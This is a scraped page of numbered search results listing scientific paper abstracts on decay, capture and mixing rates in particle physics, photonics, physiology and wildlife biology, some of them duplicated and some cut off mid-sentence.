Vitale, L; Vuagnin, G; Panvini, R S; Banerjee, Sw; Brown, C M; Fortin, D; Jackson, P D; Kowalewski, R; Roney, J M; Band, H R; Dasu, S; Datta, M; Eichenbaum, A M; Hu, H; Johnson, J R; Liu, R; Lodovico, F Di; Mohapatra, A K; Pan, Y; Prepost, R; Sekula, S J; von Wimmersperg-Toeller, J H; Wu, J; Wu, S L; Yu, Z; Neal, H 2003-10-24 We present results of a search for D0-D(-)0 mixing and a measurement of R(D), the ratio of doubly Cabibbo-suppressed decays to Cabibbo-favored decays, using D0-->K+pi- decays from 57.1 fb(-1) of data collected near sqrt[s]=10.6 GeV with the BABAR detector at the PEP-II collider. At the 95% confidence level, allowing for CP violation, we find the mixing parameters x('2)<0.0022 and -0.056rate R(M)<0.16%. In the limit of no mixing, R(D)=[0.357+/-0.022(stat)+/-0.027(syst)]% and the CP-violating asymmetry A(D)=0.095+/-0.061(stat)+/-0.083(syst). 2. Search for D0-D¯0 Mixing and a Measurement of the Doubly Cabibbo-Suppressed Decay Rate in D0→Kπ Decays Aubert, B.; Barate, R.; Boutigny, D.; Gaillard, J.-M.; Hicheur, A.; Karyotakis, Y.; Lees, J. P.; Robbe, P.; Tisserand, V.; Zghiche, A.; Palano, A.; Pompili, A.; Chen, J. C.; Qi, N. D.; Rong, G.; Wang, P.; Zhu, Y. S.; Eigen, G.; Ofte, I.; Stugu, B.; Abrams, G. S.; Borgland, A. W.; Breon, A. B.; Brown, D. N.; Button-Shafer, J.; Cahn, R. N.; Charles, E.; Day, C. T.; Gill, M. S.; Gritsan, A. V.; Groysman, Y.; Jacobsen, R. G.; Kadel, R. W.; Kadyk, J.; Kerth, L. T.; Kolomensky, Yu. G.; Kral, J. F.; Kukartsev, G.; Leclerc, C.; Levi, M. E.; Lynch, G.; Mir, L. M.; Oddone, P. J.; Orimoto, T. J.; Pripstein, M.; Roe, N. A.; Romosan, A.; Ronan, M. T.; Shelkov, V. G.; Telnov, A. V.; Wenzel, W. A.; Harrison, T. J.; Hawkes, C. M.; Knowles, D. J.; Penny, R. C.; Watson, A. T.; Watson, N. K.; Deppermann, T.; Goetzen, K.; Koch, H.; Lewandowski, B.; Pelizaeus, M.; Peters, K.; Schmuecker, H.; Steinke, M.; Barlow, N. R.; Bhimji, W.; Boyd, J. T.; Chevalier, N.; Cottingham, W. N.; Mackay, C.; Wilson, F. F.; Hearty, C.; Mattison, T. S.; McKenna, J. A.; Thiessen, D.; Kyberd, P.; McKemey, A. K.; Blinov, V. E.; Bukin, A. D.; Golubev, V. B.; Ivanchenko, V. N.; Kravchenko, E. A.; Onuchin, A. P.; Serednyakov, S. I.; Skovpen, Yu. I.; Solodov, E. P.; Yushkov, A. N.; Best, D.; Chao, M.; Kirkby, D.; Lankford, A. J.; Mandelkern, M.; McMahon, S.; Mommsen, R. K.; Roethel, W.; Stoker, D. P.; Buchanan, C.; Hadavand, H. K.; Hill, E. J.; Macfarlane, D. B.; Paar, H. P.; Rahatlou, Sh.; Schwanke, U.; Sharma, V.; Berryhill, J. W.; Campagnari, C.; Dahmes, B.; Kuznetsova, N.; Levy, S. L.; Long, O.; Lu, A.; Mazur, M. A.; Richman, J. D.; Verkerke, W.; Beringer, J.; Eisner, A. M.; Grothe, M.; Heusch, C. A.; Lockman, W. S.; Schalk, T.; Schmitz, R. E.; Schumm, B. A.; Seiden, A.; Turri, M.; Walkowiak, W.; Williams, D. C.; Wilson, M. G.; Albert, J.; Chen, E.; Dorsten, M. P.; Dubois-Felsmann, G. P.; Dvoretskii, A.; Hitlin, D. G.; Narsky, I.; Porter, F. C.; Ryd, A.; Samuel, A.; Yang, S.; Jayatilleke, S.; Mancinelli, G.; Meadows, B. T.; Sokoloff, M. D.; Barillari, T.; Blanc, F.; Bloom, P.; Clark, P. J.; Ford, W. T.; Nauenberg, U.; Olivas, A.; Rankin, P.; Roy, J.; Smith, J. G.; van Hoek, W. C.; Zhang, L.; Harton, J. L.; Hu, T.; Soffer, A.; Toki, W. H.; Wilson, R. J.; Zhang, J.; Altenburg, D.; Brandt, T.; Brose, J.; Colberg, T.; Dickopp, M.; Dubitzky, R. S.; Hauke, A.; Lacker, H. M.; Maly, E.; Müller-Pfefferkorn, R.; Nogowski, R.; Otto, S.; Schubert, K. R.; Schwierz, R.; Spaan, B.; Wilden, L.; Bernard, D.; Bonneaud, G. R.; Brochard, F.; Cohen-Tanugi, J.; Thiebaux, Ch.; Vasileiadis, G.; Verderi, M.; Khan, A.; Lavin, D.; Muheim, F.; Playfer, S.; Swain, J. E.; Tinslay, J.; Bozzi, C.; Piemontese, L.; Sarti, A.; Treadwell, E.; Anulli, F.; Baldini-Ferroli, R.; Calcaterra, A.; de Sangro, R.; Falciai, D.; Finocchiaro, G.; Patteri, P.; Peruzzi, I. M.; Piccolo, M.; Zallo, A.; Buzzo, A.; Contri, R.; Crosetti, G.; Vetere, M. Lo; Macri, M.; Monge, M. R.; Passaggio, S.; Pastore, F. C.; Patrignani, C.; Robutti, E.; Santroni, A.; Tosi, S.; Bailey, S.; Morii, M.; Grenier, G. J.; Lee, S.-J.; Mallik, U.; Cochran, J.; Crawley, H. B.; Lamsa, J.; Meyer, W. T.; Prell, S.; Rosenberg, E. I.; Yi, J.; Davier, M.; Grosdidier, G.; Höcker, A.; Laplace, S.; Le Diberder, F.; Lepeltier, V.; Lutz, A. M.; Petersen, T. C.; Plaszczynski, S.; Schune, M. H.; Tantot, L.; Wormser, G.; Bionta, R. M.; Brigljević, V.; Cheng, C. H.; Lange, D. J.; Wright, D. M.; Bevan, A. J.; Fry, J. R.; Gabathuler, E.; Gamet, R.; Kay, M.; Payne, D. J.; Sloane, R. J.; Touramanis, C.; Aspinwall, M. L.; Bowerman, D. A.; Dauncey, P. D.; Egede, U.; Eschrich, I.; Morton, G. W.; Nash, J. A.; Sanders, P.; Taylor, G. P.; Back, J. J.; Bellodi, G.; Harrison, P. F.; Shorthouse, H. W.; Strother, P.; Vidal, P. B.; Cowan, G.; Flaecher, H. U.; George, S.; Green, M. G.; Kurup, A.; Marker, C. E.; McMahon, T. R.; Ricciardi, S.; Salvatore, F.; Vaitsas, G.; Winter, M. A.; Brown, D.; Davis, C. L.; Allison, J.; Barlow, R. J.; Forti, A. C.; Hart, P. A.; Jackson, F.; Lafferty, G. D.; Lyon, A. J.; Weatherall, J. H.; Williams, J. C.; Farbin, A.; Jawahery, A.; Kovalskyi, D.; Lae, C. K.; Lillard, V.; Roberts, D. A.; Blaylock, G.; Dallapiccola, C.; Flood, K. T.; Hertzbach, S. S.; Kofler, R.; Koptchev, V. B.; Moore, T. B.; Staengle, H.; Willocq, S.; Cowan, R.; Sciolla, G.; Taylor, F.; Yamamoto, R. K.; Mangeol, D. J.; Milek, M.; Patel, P. M.; Lazzaro, A.; Palombo, F.; Bauer, J. M.; Cremaldi, L.; Eschenburg, V.; Godang, R.; Kroeger, R.; Reidy, J.; Sanders, D. A.; Summers, D. J.; Zhao, H. W.; Hast, C.; Taras, P.; Nicholson, H.; Cartaro, C.; Cavallo, N.; de Nardo, G.; Fabozzi, F.; Gatto, C.; Lista, L.; Paolucci, P.; Piccolo, D.; Sciacca, C.; Baak, M. A.; Raven, G.; Losecco, J. M.; Gabriel, T. A.; Brau, B.; Pulliam, T.; Brau, J.; Frey, R.; Iwasaki, M.; Potter, C. T.; Sinev, N. B.; Strom, D.; Torrence, E.; Colecchia, F.; Dorigo, A.; Galeazzi, F.; Margoni, M.; Morandin, M.; Posocco, M.; Rotondo, M.; Simonetto, F.; Stroili, R.; Tiozzo, G.; Voci, C.; Benayoun, M.; Briand, H.; Chauveau, J.; David, P.; de La Vaissière, Ch.; del Buono, L.; Hamon, O.; Leruste, Ph.; Ocariz, J.; Pivk, M.; Roos, L.; Stark, J.; T'jampens, S.; Manfredi, P. F.; Re, V.; Gladney, L.; Guo, Q. H.; Panetta, J.; Angelini, C.; Batignani, G.; Bettarini, S.; Bondioli, M.; Bucci, F.; Calderini, G.; Carpinelli, M.; Forti, F.; Giorgi, M. A.; Lusiani, A.; Marchiori, G.; Martinez-Vidal, F.; Morganti, M.; Neri, N.; Paoloni, E.; Rama, M.; Rizzo, G.; Sandrelli, F.; Walsh, J.; Haire, M.; Judd, D.; Paick, K.; Wagoner, D. E.; Danielson, N.; Elmer, P.; Lu, C.; Miftakov, V.; Olsen, J.; Smith, A. J.; Varnes, E. W.; Bellini, F.; Cavoto, G.; del Re, D.; Faccini, R.; Ferrarotto, F.; Ferroni, F.; Gaspero, M.; Leonardi, E.; Mazzoni, M. A.; Morganti, S.; Pierini, M.; Piredda, G.; Tehrani, F. Safai; Serra, M.; Voena, C.; Christ, S.; Wagner, G.; Waldi, R.; Adye, T.; de Groot, N.; Franek, B.; Geddes, N. I.; Gopal, G. P.; Olaiya, E. O.; Xella, S. M.; Aleksan, R.; Emery, S.; Gaidot, A.; Ganzhur, S. F.; Giraud, P.-F.; de Monchenault, G. Hamel; Kozanecki, W.; Langer, M.; London, G. W.; Mayer, B.; Schott, G.; Vasseur, G.; Yeche, Ch.; Zito, M.; Purohit, M. V.; Weidemann, A. W.; Yumiceva, F. X.; Aston, D.; Bartoldus, R.; Berger, N.; Boyarski, A. M.; Buchmueller, O. L.; Convery, M. R.; Coupal, D. P.; Dong, D.; Dorfan, J.; Dujmic, D.; Dunwoodie, W.; Field, R. C.; Glanzman, T.; Gowdy, S. J.; Grauges-Pous, E.; Hadig, T.; Halyo, V.; Hryn'ova, T.; Innes, W. R.; Jessop, C. P.; Kelsey, M. H.; Kim, P.; Kocian, M. L.; Langenegger, U.; Leith, D. W.; Luitz, S.; Luth, V.; Lynch, H. L.; Marsiske, H.; Menke, S.; Messner, R.; Muller, D. R.; O'Grady, C. P.; Ozcan, V. E.; Perazzo, A.; Perl, M.; Petrak, S.; Ratcliff, B. N.; Robertson, S. H.; Roodman, A.; Salnikov, A. A.; Schindler, R. H.; Schwiening, J.; Simi, G.; Snyder, A.; Soha, A.; Stelzer, J.; Su, D.; Sullivan, M. K.; Tanaka, H. A.; Va'Vra, J.; Wagner, S. R.; Weaver, M.; Weinstein, A. J.; Wisniewski, W. J.; Wright, D. H.; Young, C. C.; Burchat, P. R.; Meyer, T. I.; Roat, C.; Ahmed, S.; Ernst, J. A.; Bugg, W.; Krishnamurthy, M.; Spanier, S. M.; Eckmann, R.; Kim, H.; Ritchie, J. L.; Schwitters, R. F.; Izen, J. M.; Kitayama, I.; Lou, X. C.; Ye, S.; Bianchi, F.; Bona, M.; Gallo, F.; Gamba, D.; Borean, C.; Bosisio, L.; Della Ricca, G.; Dittongo, S.; Grancagnolo, S.; Lanceri, L.; Poropat, P.; Vitale, L.; Vuagnin, G.; Panvini, R. S.; Banerjee, Sw.; Brown, C. M.; Fortin, D.; Jackson, P. D.; Kowalewski, R.; Roney, J. M.; Band, H. R.; Dasu, S.; Datta, M.; Eichenbaum, A. M.; Hu, H.; Johnson, J. R.; Liu, R.; Di Lodovico, F.; Mohapatra, A. K.; Pan, Y.; Prepost, R.; Sekula, S. J.; von Wimmersperg-Toeller, J. H.; Wu, J.; Wu, S. L.; Yu, Z.; Neal, H. 2003-10-01 We present results of a search for D0-D¯0 mixing and a measurement of RD, the ratio of doubly Cabibbo-suppressed decays to Cabibbo-favored decays, using D0→K+π- decays from 57.1 fb-1 of data collected near (s)=10.6 GeV with the BABAR detector at the PEP-II collider. At the 95% confidence level, allowing for CP violation, we find the mixing parameters x'2<0.0022 and -0.056rate RM<0.16%. In the limit of no mixing, RD=[0.357±0.022(stat)±0.027(syst)]% and the CP-violating asymmetry AD=0.095±0.061(stat)±0.083(syst). 3. Role of the bound-state wave function in capture-loss rates: Slow proton in an electron gas SciTech Connect Alducin, M.; Nagy, I. 2003-07-01 Capture and loss rates for protons moving in an electron gas are calculated using many-body perturbation theory. The role of the form of the bound-state wave function for weakly bound states around the proton is analyzed. We find significant differences (up to a factor of 2 higher) in the values of Auger capture and loss rates when using Hulthen-type instead of hydrogenic wave functions. Its relevance in stopping power is briefly discussed. 4. Toward Capturing Momentary Changes of Heart Rate Variability by a Dynamic Analysis Method. PubMed Zhang, Haoshi; Zhu, Mingxing; Zheng, Yue; Li, Guanglin 2015-01-01 The analysis of heart rate variability (HRV) has been performed on long-term electrocardiography (ECG) recordings (12~24 hours) and short-term recordings (2~5 minutes), which may not capture momentary change of HRV. In this study, we present a new method to analyze the momentary HRV (mHRV). The ECG recordings were segmented into a series of overlapped HRV analysis windows with a window length of 5 minutes and different time increments. The performance of the proposed method in delineating the dynamics of momentary HRV measurement was evaluated with four commonly used time courses of HRV measures on both synthetic time series and real ECG recordings from human subjects and dogs. Our results showed that a smaller time increment could capture more dynamical information on transient changes. Considering a too short increment such as 10 s would cause the indented time courses of the four measures, a 1-min time increment (4-min overlapping) was suggested in the analysis of mHRV in the study. ECG recordings from human subjects and dogs were used to further assess the effectiveness of the proposed method. The pilot study demonstrated that the proposed analysis of mHRV could provide more accurate assessment of the dynamical changes in cardiac activity than the conventional measures of HRV (without time overlapping). The proposed method may provide an efficient means in delineating the dynamics of momentary HRV and it would be worthy performing more investigations. 5. Toward Capturing Momentary Changes of Heart Rate Variability by a Dynamic Analysis Method PubMed Central Zhang, Haoshi; Zhu, Mingxing; Zheng, Yue; Li, Guanglin 2015-01-01 The analysis of heart rate variability (HRV) has been performed on long-term electrocardiography (ECG) recordings (12~24 hours) and short-term recordings (2~5 minutes), which may not capture momentary change of HRV. In this study, we present a new method to analyze the momentary HRV (mHRV). The ECG recordings were segmented into a series of overlapped HRV analysis windows with a window length of 5 minutes and different time increments. The performance of the proposed method in delineating the dynamics of momentary HRV measurement was evaluated with four commonly used time courses of HRV measures on both synthetic time series and real ECG recordings from human subjects and dogs. Our results showed that a smaller time increment could capture more dynamical information on transient changes. Considering a too short increment such as 10 s would cause the indented time courses of the four measures, a 1-min time increment (4-min overlapping) was suggested in the analysis of mHRV in the study. ECG recordings from human subjects and dogs were used to further assess the effectiveness of the proposed method. The pilot study demonstrated that the proposed analysis of mHRV could provide more accurate assessment of the dynamical changes in cardiac activity than the conventional measures of HRV (without time overlapping). The proposed method may provide an efficient means in delineating the dynamics of momentary HRV and it would be worthy performing more investigations. PMID:26172953 6. Two-dimensional treatment of the level shift and decay rate in photonic crystals SciTech Connect Fussell, D.P.; McPhedran, R.C.; Martijn de Sterke, C. 2005-10-01 We present a comprehensive treatment of the level shift and decay rate of a model line source in a two-dimensional photonic crystal (2D PC) composed of circular cylinders. The quantities in this strictly two-dimensional system are determined by the two-dimensional local density of states (2D LDOS), which we compute using Rayleigh-multipole methods. We extend the critical point analysis that is traditionally applied to the 2D DOS (or decay rate) to the level shift. With this, we unify the crucial quantity for experiment - the 2D LDOS in a finite PC - with the band structure and the 2D DOS, 2D LDOS, and level shift in infinite PC's. Consistent with critical point analysis, large variations in the level shift are associated with large variations in the 2D DOS (and 2D LDOS), corroborating a giant anomalous Lamb shift. The boundary of a finite 2D PC can produce resonances that cause the 2D LDOS in a finite 2D PC to differ markedly from the 2D LDOS in an infinite 2D PC. 7. Two-dimensional treatment of the level shift and decay rate in photonic crystals. PubMed Fussell, D P; McPhedran, R C; Martijn de Sterke, C 2005-10-01 We present a comprehensive treatment of the level shift and decay rate of a model line source in a two-dimensional photonic crystal (2D PC) composed of circular cylinders. The quantities in this strictly two-dimensional system are determined by the two-dimensional local density of states (2D LDOS), which we compute using Rayleigh-multipole methods. We extend the critical point analysis that is traditionally applied to the 2D DOS (or decay rate) to the level shift. With this, we unify the crucial quantity for experiment--the 2D LDOS in a finite PC--with the band structure and the 2D DOS, 2D LDOS, and level shift in infinite PC's. Consistent with critical point analysis, large variations in the level shift are associated with large variations in the 2D DOS (and 2D LDOS), corroborating a giant anomalous Lamb shift. The boundary of a finite 2D PC can produce resonances that cause the 2D LDOS in a finite 2D PC to differ markedly from the 2D LDOS in an infinite 2D PC. 8. Size and shape dependent photoluminescence and excited state decay rates of diamondoids. PubMed Richter, Robert; Wolter, David; Zimmermann, Tobias; Landt, Lasse; Knecht, Andre; Heidrich, Christoph; Merli, Andrea; Dopfer, Otto; Reiss, Philipp; Ehresmann, Arno; Petersen, Jens; Dahl, Jeremy E; Carlson, Robert M K; Bostedt, Christoph; Möller, Thomas; Mitric, Roland; Rander, Torbjörn 2014-02-21 We present photoluminescence spectra and excited state decay rates of a series of diamondoids, which represent molecular structural analogues to hydrogen-passivated bulk diamond. Specific isomers of the five smallest diamondoids (adamantane-pentamantane) have been brought into the gas phase and irradiated with synchrotron radiation. All investigated compounds show intrinsic photoluminescence in the ultraviolet spectral region. The emission spectra exhibit pronounced vibrational fine structure which is analyzed using quantum chemical calculations. We show that the geometrical relaxation of the first excited state of adamantane, exhibiting Rydberg character, leads to the loss of Td symmetry. The luminescence of adamantane is attributed to a transition from the delocalized first excited state into different vibrational modes of the electronic ground state. Similar geometrical changes of the excited state structure have also been identified in the other investigated diamondoids. The excited state decay rates show a clear dependence on the size of the diamondoid, but are independent of the particle geometry, further indicating a loss of particle symmetry upon electronic excitation. 9. Two-dimensional treatment of the level shift and decay rate in photonic crystals Fussell, D. P.; McPhedran, R. C.; Martijn de Sterke, C. 2005-10-01 We present a comprehensive treatment of the level shift and decay rate of a model line source in a two-dimensional photonic crystal (2D PC) composed of circular cylinders. The quantities in this strictly two-dimensional system are determined by the two-dimensional local density of states (2D LDOS), which we compute using Rayleigh-multipole methods. We extend the critical point analysis that is traditionally applied to the 2D DOS (or decay rate) to the level shift. With this, we unify the crucial quantity for experiment—the 2D LDOS in a finite PC—with the band structure and the 2D DOS, 2D LDOS, and level shift in infinite PC’s. Consistent with critical point analysis, large variations in the level shift are associated with large variations in the 2D DOS (and 2D LDOS), corroborating a giant anomalous Lamb shift. The boundary of a finite 2D PC can produce resonances that cause the 2D LDOS in a finite 2D PC to differ markedly from the 2D LDOS in an infinite 2D PC. 10. Sensitivity of β -decay rates to the radial dependence of the nucleon effective mass Severyukhin, A. P.; Margueron, J.; Borzov, I. N.; Van Giai, N. 2015-03-01 We analyze the sensitivity of β -decay rates in 78Ni and Sn,132100 to a correction term in Skyrme energy-density functionals (EDFs) which modifies the radial shape of the nucleon effective mass. This correction is added on top of several Skyrme parametrizations which are selected from their effective mass properties and predictions about the stability properties of 132Sn . The impact of the correction on high-energy collective modes is shown to be moderate. From the comparison of the effects induced by the surface-peaked effective mass in the three doubly magic nuclei, it is found that 132Sn is largely impacted by the correction, while 78Ni and 100Sn are only moderately affected. We conclude that β -decay rates in these nuclei can be used as a test of different parts of the nuclear EDF: 78Ni and 100Sn are mostly sensitive to the particle-hole interaction through the B (GT) values, while 132Sn is sensitive to the radial shape of the effective mass. Possible improvements of these different parts could therefore be better constrained in the future. 11. Neutron capture production rates of cosmogenic 60Co, 59Ni and 36Cl in stony meteorites NASA Technical Reports Server (NTRS) Spergel, M. S.; Reedy, R. C.; Lazareth, O. W.; Levy, P. W. 1986-01-01 Results for neutron flux calculations in stony meteoroids (of various radii and compositions) and production rates for Cl-36, Ni-59, and Co-60 are reported. The Ni-59/Co-60 ratio is nearly constant with depth in most meteorites: this effect is consistent with the neutron flux and capture cross section properties. The shape of the neutron flux energy spectrum, varies little with depth in a meteorite. The size of the parent meteorite can be determined from one of its fragments, using the Ni-59/Co-60 ratios, if the parent meteorite was less than 75 g/cm(2) in radius. If the parent meteorite was larger, a lower limit on the size of the parent meteorite can be determined from a fragment. In C3 chondrites this is not possible. In stony meteorites with R less than 50 g/cm(2) the calculated Co-60 production rates (mass less than 4 kg), are below 1 atom/min g-Co. The highest Co-60 production rates occur in stony meteorites with radius about 250 g/cm(2) (1.4 m across). In meteorites with radii greater than 400 g/cm(2), the maximum Co-60 production rate occurs at a depth of about 175 g/cm(2) in L-chondrite, 125 g/cm(2) in C3 chrondrite, and 190 g/cm(2) in aubrites. 12. Lepton-violating β-β-, β+β+ decays, (e -, e +) conversion and double electron capture in gauge theories 1983-05-01 The lepton violating processes β-β-, β+β+, (e -, e +) and double electron capture have been investigated in the context of modern gauge theories. Mechanisms involving light or heavy intermediate Majorana neutrinos, with or without right-handed currents, as well as Higgs particles, have been studied. The lepton-violating emission of light bosons, recently proposed by Georgi, Glashow and Nussinov, has also been analyzed. From the analysis of the 48Ca → 48Ti data the following limits emerge: ∣ < m v > ∣ < 80 eV, m N > (2-20) × 10 3GeV, m W R > 400 GeVand g v eoverlinevex 0 < 5 × 10 -3. The above limits are then used to predict the lifetimes for β+β+, (e -, e +) and double electron capture in the A = 58, 92 and 96 systems employing realistic nuclear models. 13. New results for reaction rate of the proton radiative capture on 3H Dubovichenko, S. B.; Dzhazairov-Kakhramanov, A. V.; Afanasyeva, N. V. 2017-07-01 Calculations of the reaction rate of the proton radiative capture on 3H at temperatures from 0.01 T9 up to 5 T9, which are based on the theoretical results for the astrophysical S-factor and take into account the latest experimental data, were carried out. Theoretical results for the S-factor at energies from 1 keV up to 5 MeV were obtained in the framework of the modified potential cluster model with the classification of orbital states according to Young tableaux. On the basis of used nuclear model of the interaction of p and 3H particles there was shown possibility of description the latest experimental data for the S-factor at the energy range from 50 keV up to 5 MeV. 14. Simultaneous use of mark-recapture and radiotelemetry to estimate survival, movement, and capture rates USGS Publications Warehouse Powell, L.A.; Conroy, M.J.; Hines, J.E.; Nichols, J.D.; Krementz, D.G. 2000-01-01 Biologists often estimate separate survival and movement rates from radio-telemetry and mark-recapture data from the same study population. We describe a method for combining these data types in a single model to obtain joint, potentially less biased estimates of survival and movement that use all available data. We furnish an example using wood thrushes (Hylocichla mustelina) captured at the Piedmont National Wildlife Refuge in central Georgia in 1996. The model structure allows estimation of survival and capture probabilities, as well as estimation of movements away from and into the study area. In addition, the model structure provides many possibilities for hypothesis testing. Using the combined model structure, we estimated that wood thrush weekly survival was 0.989 ? 0.007 ( ?SE). Survival rates of banded and radio-marked individuals were not different (alpha hat [S_radioed, ~ S_banded]=log [S hat _radioed/ S hat _banded]=0.0239 ? 0.0435). Fidelity rates (weekly probability of remaining in a stratum) did not differ between geographic strata (psi hat=0.911 ? 0.020; alpha hat [psi11, psi22]=0.0161 ? 0.047), and recapture rates ( = 0.097 ? 0.016) banded and radio-marked individuals were not different (alpha hat [p_radioed, p_banded]=0.145 ? 0.655). Combining these data types in a common model resulted in more precise estimates of movement and recapture rates than separate estimation, but ability to detect stratum or mark-specific differences in parameters was week. We conducted simulation trials to investigate the effects of varying study designs on parameter accuracy and statistical power to detect important differences. Parameter accuracy was high (relative bias [RBIAS] <2 %) and confidence interval coverage close to nominal, except for survival estimates of banded birds for the 'off study area' stratum, which were negatively biased (RBIAS -7 to -15%) when sample sizes were small (5-10 banded or radioed animals 'released' per time interval). To provide 15. Can a first-order exponential decay model fit heart rate recovery after resistance exercise? PubMed Bartels-Ferreira, Rhenan; de Sousa, Élder D; Trevizani, Gabriela A; Silva, Lilian P; Nakamura, Fábio Y; Forjaz, Cláudia L M; Lima, Jorge Roberto P; Peçanha, Tiago 2015-03-01 The time-constant of postexercise heart rate recovery (HRRτ ) obtained by fitting heart rate decay curve by a first-order exponential fitting has being used to assess cardiac autonomic recovery after endurance exercise. The feasibility of this model was not tested after resistance exercise (RE). The aim of this study was to test the goodness of fit of the first-order exponential decay model to fit heart rate recovery (HRR) after RE. Ten healthy subjects participated in the study. The experimental sessions occurred in two separated days and consisted of performance of 1 set of 10 repetitions at 50% or 80% of the load achieved on the one-repetition maximum test [low-intensity (LI) and high-intensity (HI) sessions, respectively]. Heart rate (HR) was continuously registered before and during exercise and also for 10 min of recovery. A monoexponential equation was used to fit the HRR curve during the postexercise period using different time windows (i.e. 30, 60, 90, … 600 s). For each time window, (i) HRRτ was calculated and (ii) variation of HR explained by the model (R(2) goodness of fit index) was assessed. The HRRτ showed stabilization from 360 and 420 s on LI and HI, respectively. Acceptable R(2) values were observed from the 360 s on LI (R(2) > 0.65) and at all tested time windows on HI (R(2) > 0.75). In conclusion, this study showed that using a minimum length of monitoring (~420 s) HRR after RE can be adequately modelled by a first-order exponential fitting. © 2014 Scandinavian Society of Clinical Physiology and Nuclear Medicine. Published by John Wiley & Sons Ltd. 16. Mixture models for estimating the size of a closed population when capture rates vary among individuals USGS Publications Warehouse Dorazio, R.M.; Royle, J. Andrew 2003-01-01 We develop a parameterization of the beta-binomial mixture that provides sensible inferences about the size of a closed population when probabilities of capture or detection vary among individuals. Three classes of mixture models (beta-binomial, logistic-normal, and latent-class) are fitted to recaptures of snowshoe hares for estimating abundance and to counts of bird species for estimating species richness. In both sets of data, rates of detection appear to vary more among individuals (animals or species) than among sampling occasions or locations. The estimates of population size and species richness are sensitive to model-specific assumptions about the latent distribution of individual rates of detection. We demonstrate using simulation experiments that conventional diagnostics for assessing model adequacy, such as deviance, cannot be relied on for selecting classes of mixture models that produce valid inferences about population size. Prior knowledge about sources of individual heterogeneity in detection rates, if available, should be used to help select among classes of mixture models that are to be used for inference. 17. Initial measurements of O-ion and He-ion decay rates observed from the Van Allen probes RBSPICE instrument PubMed Central Gerrard, Andrew; Lanzerotti, Louis; Gkioulidou, Matina; Mitchell, Donald; Manweiler, Jerry; Bortnik, Jacob; Keika, Kunihiro 2014-01-01 H-ion (∼45 keV to ∼600 keV), He-ion (∼65 keV to ∼520 keV), and O-ion (∼140 keV to ∼1130 keV) integral flux measurements, from the Radiation Belt Storm Probe Ion Composition Experiment (RBSPICE) instrument aboard the Van Allan Probes spacecraft B, are reported. These abundance data form a cohesive picture of ring current ions during the first 9 months of measurements. Furthermore, the data presented herein are used to show injection characteristics via the He-ion/H-ion abundance ratio and the O-ion/H-ion abundance ratio. Of unique interest to ring current dynamics are the spatial-temporal decay characteristics of the two injected populations. We observe that He-ions decay more quickly at lower L shells, on the order of ∼0.8 day at L shells of 3–4, and decay more slowly with higher L shell, on the order of ∼1.7 days at L shells of 5–6. Conversely, O-ions decay very rapidly (∼1.5 h) across all L shells. The He-ion decay time are consistent with previously measured and calculated lifetimes associated with charge exchange. The O-ion decay time is much faster than predicted and is attributed to the inclusion of higher-energy (> 500 keV) O-ions in our decay rate estimation. We note that these measurements demonstrate a compelling need for calculation of high-energy O-ion loss rates, which have not been adequately studied in the literature to date. Key Points We report initial observations of ring current ions We show that He-ion decay rates are consistent with theory We show that O-ions with energies greater than 500 keV decay very rapidly PMID:26167435 18. Initial measurements of O-ion and He-ion decay rates observed from the Van Allen probes RBSPICE instrument. PubMed Gerrard, Andrew; Lanzerotti, Louis; Gkioulidou, Matina; Mitchell, Donald; Manweiler, Jerry; Bortnik, Jacob; Keika, Kunihiro 2014-11-01 H-ion (∼45 keV to ∼600 keV), He-ion (∼65 keV to ∼520 keV), and O-ion (∼140 keV to ∼1130 keV) integral flux measurements, from the Radiation Belt Storm Probe Ion Composition Experiment (RBSPICE) instrument aboard the Van Allan Probes spacecraft B, are reported. These abundance data form a cohesive picture of ring current ions during the first 9 months of measurements. Furthermore, the data presented herein are used to show injection characteristics via the He-ion/H-ion abundance ratio and the O-ion/H-ion abundance ratio. Of unique interest to ring current dynamics are the spatial-temporal decay characteristics of the two injected populations. We observe that He-ions decay more quickly at lower L shells, on the order of ∼0.8 day at L shells of 3-4, and decay more slowly with higher L shell, on the order of ∼1.7 days at L shells of 5-6. Conversely, O-ions decay very rapidly (∼1.5 h) across all L shells. The He-ion decay time are consistent with previously measured and calculated lifetimes associated with charge exchange. The O-ion decay time is much faster than predicted and is attributed to the inclusion of higher-energy (> 500 keV) O-ions in our decay rate estimation. We note that these measurements demonstrate a compelling need for calculation of high-energy O-ion loss rates, which have not been adequately studied in the literature to date. We report initial observations of ring current ionsWe show that He-ion decay rates are consistent with theoryWe show that O-ions with energies greater than 500 keV decay very rapidly. 19. The minimum energy decay rate in quasi-isotropic grid turbulence Davidson, P. A. 2011-08-01 We consider high Reynolds number, freely-decaying, isotropic turbulence in which the large scales evolve in a self-similar manner when normalized by the integral scales, u and ℓ. As it is well known, a range of possible behaviors may be observed depending on the form of the longitudinal velocity correlation at large separation, uf∞=u 2f(r →∞). We consider the cases u2f∞=cmr-m,2≤m ≤6, whose spectral counterpart is E(k →0)~cmkm -1 for m <6, with or without a lnk correction, and E(k →0)~I k4 for m =6. (I is Loitsyansky's integral.) It has long been known that the cmm=constant during the decay. This, in turn, sets the energy decay rate as u2~t-(1-p)2m /(m+2), where p is the power-law exponent for the normalized dissipation rate, εℓ/εℓu3u3~t-p, observed empirically to be a small positive number in grid turbulence. We systematically explore the properties of these different classes of turbulence and arrive at the following conclusions. (i) The invariance of cm is a direct consequence of linear momentum conservation for m ≤4, and angular momentum conservation for m =5. (ii) The classical spectra of Saffman, E(k →0)~c3k2, and Batchelor, E(k →0)~Ik4, are robust in the sense that they emerge from a broad class of initial conditions. In particular, it is necessary only that <ωi ω'j >∞ ≤O(r-8) at t =0. The non-classical spectra (m =2,4,5), on the other hand, require very specific initial conditions in order to be realized, of the form <ωiω'j>∞=O(r-(m +2)). (Note the equality rather than the inequality here.) This makes the non-classical spectra less likely to be observed in practice. (iii) The case of m =2, which is usually associated with the u2~t-1 decay law, is pathological in a number of respects. For example, its spectral tensor diverges as k →0, and the long-range correlations ∞=O(r-2) are too strong to be a consequence of the Biot-Savart law. (It is the Biot-Savart law that lies behind the long-range correlations in the 20. Tyrosyl rotamer interconversion rates and the fluorescence decays of N-acetyltyrosinamide and short tyrosyl peptides. PubMed Unruh, Jay R; Liyanage, Mangala Roshan; Johnson, Carey K 2007-05-17 It has long been recognized that the fluorescence lifetimes of amino acid residues such as tyrosine and tryptophan depend on the rotameric configuration of the aromatic side chain, but estimates of the rate of interchange of rotameric states have varied widely. We report measurements of the rotameric populations and interchange rates for tyrosine in N-acetyltyrosinamide (NATyrA), the tripeptide Tyr-Gly-Gly (YGG), and the 